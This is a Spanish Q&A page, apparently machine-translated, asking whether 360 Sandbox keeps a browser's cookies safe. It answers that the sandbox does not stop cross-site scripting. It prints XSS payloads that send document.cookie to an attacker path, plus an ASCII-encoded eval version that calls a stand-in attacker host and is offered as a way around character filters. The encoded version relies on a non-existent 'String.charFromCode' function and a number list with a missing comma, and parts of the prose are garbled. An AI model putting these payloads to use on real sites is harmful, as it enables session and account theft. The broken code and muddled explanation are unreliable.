Red de conocimiento informático - Descarga de software - ¿Al abrir el navegador con 360 Sandbox se revelarán cookies o información de la cuenta en el navegador?

¿Al abrir el navegador con 360 Sandbox se revelarán cookies o información de la cuenta en el navegador?

Las principales formas de obtener información de cookies:

1. Lea directamente el archivo de cookies desde el disco. El directorio de almacenamiento de información de cookies para el sistema Windows es C:/Documents and Settings/%. yourname%/ Cookies, la información de las cookies de Firefox se encuentra en el directorio de Perfiles de Firefox.

2. Utilizar un rastreador de red para obtener las cookies transmitidas en la red.

3. Utilizar algunas herramientas de gestión de cookies para obtener cookies en la memoria o en el sistema de archivos.

4. Utilice secuencias de comandos entre sitios para robar cookies de otras personas

Usar navegadores para filtrar cookies es básicamente el último, y los ataques entre sitios.

El principio de 360 ​​Sandbox es proporcionar una copia del entorno del sistema y reducir algunos permisos. Todas las operaciones del programa en el Sandbox, como agregar archivos, modificar archivos, registrar, etc., no son posibles. Realmente modificado en el sistema, pero se cambia a una copia. Esta copia es invisible para los programas normales del sistema real. Cuando se cierra el sandbox, la copia desaparece y el contenido no se guardará localmente.

El ataque entre sitios utiliza el siguiente código para obtener cookies robadas:

var x=new Image();x.src='/eatMoreCookies?c='

+document.cookie;

O así:

document.write("〈 img src='/eatMoreCookies"+

"? c ="+document.cookie+"'〉");

Si algunos caracteres están prohibidos, conviértalos a números decimales ASCII y luego use la función String.charFromCode() de JavaScript. El siguiente JavaScript es equivalente al JavaScript anterior:

eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,

97,103,101,40,41,59,120, 46,115,114 ,99,61,39,104,116,116,112,58,47,47,

97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47

101,97, 116,77,111,114,101,67,111,111,107,105,101,115, 63,99 ,61,39,43,

100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));

Simplemente lee datos de tu disco duro, pero no los almacena. , por lo que la arena de las cajas de 360 ​​Cookies no tiene ningún efecto en la prevención de ataques entre sitios

上篇: Cómo distinguir Ricoh mpc5503 código 312-1 下篇: Las diez mejores plataformas de venta al por mayor de juguetes

Artículos populares